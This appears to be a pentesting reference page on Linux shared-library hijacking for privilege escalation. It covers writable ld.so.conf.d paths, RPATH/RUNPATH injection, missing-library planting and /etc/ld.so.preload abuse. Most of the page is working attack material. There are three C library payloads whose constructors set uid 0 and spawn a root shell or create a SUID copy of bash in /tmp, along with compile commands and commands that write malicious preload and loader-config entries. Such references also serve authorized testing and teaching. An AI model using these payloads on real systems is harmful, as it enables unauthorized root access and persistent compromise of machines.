Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Linux binaries load shared libraries (.so) at runtime. If you can control where libraries are loaded from, you can inject malicious code that runs with the binary’s privileges.

Library Search Order

1. RPATH (embedded in binary, deprecated)
2. LD_LIBRARY_PATH (environment variable)
3. RUNPATH (embedded in binary)
4. /etc/ld.so.cache (generated from ld.so.conf)
5. /lib and /usr/lib (default)

Writable /etc/ld.so.conf.d/

ls -la /etc/ld.so.conf.d/
If writable, add custom library path: 
echo "/tmp/evil" > /etc/ld.so.conf.d/evil.conf
ldconfig
Create malicious library in /tmp/evil/ matching a library name used by a root process.

Writable Library Directories

Check if any configured library path is writable: 
cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null
ldconfig -p | awk -F'=> ' '{print $2}' | xargs -I{} dirname {} | sort -u | while read d; do [ -w "$d" ] && echo "WRITABLE: $d"; done
If writable → replace existing library or add new one.

RPATH / RUNPATH Injection

Check Binary for RPATH/RUNPATH

readelf -d /usr/local/bin/target | grep -i "rpath\|runpath"

objdump -p /usr/local/bin/target | grep -i "rpath\|runpath"

Example Output

RUNPATH: /home/user/lib:/usr/lib
If /home/user/lib is writable:

Find Libraries the Binary Loads

ldd /usr/local/bin/target

Create Malicious Library

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
}
Compile: 
gcc -shared -fPIC -o /home/user/lib/libtarget.so hijack.c
Run SUID binary or wait for root service to execute it.

Missing Shared Library

If a SUID binary or root service tries to load a library that doesn’t exist:

Find Missing Libraries

strace /usr/local/bin/suid-binary 2>&1 | grep "No such file"

ldd /usr/local/bin/suid-binary | grep "not found"

Example

libcustom.so => not found
Find writable directory in search path and create the library: 
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}

gcc -shared -fPIC -nostartfiles -o /writable/path/libcustom.so exploit.c

ld.so.preload

/etc/ld.so.preload is loaded before all other libraries for every binary.

Check Permissions

ls -la /etc/ld.so.preload
If writable: 
echo "/tmp/evil.so" > /etc/ld.so.preload
Create evil.so: 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    if (getuid() == 0) {
        unsetenv("LD_PRELOAD");
        system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
    }
}

gcc -shared -fPIC -nostartfiles -o /tmp/evil.so evil.c
Next time any root process runs → payload executes.

ldconfig Abuse

If you can run ldconfig (directly or via sudo): 
sudo ldconfig
After adding malicious path to /etc/ld.so.conf.d/ or placing library in existing path, ldconfig rebuilds the cache: 
# Verify cache updated
ldconfig -p | grep evil

Quick Reference

ScenarioTechnique
Writable /etc/ld.so.conf.d/Add custom lib path + ldconfig
Writable RPATH/RUNPATH dirDrop malicious .so
Missing library (not found)Create .so in search path
Writable /etc/ld.so.preloadPreload malicious .so globally
Writable library directoryReplace existing .so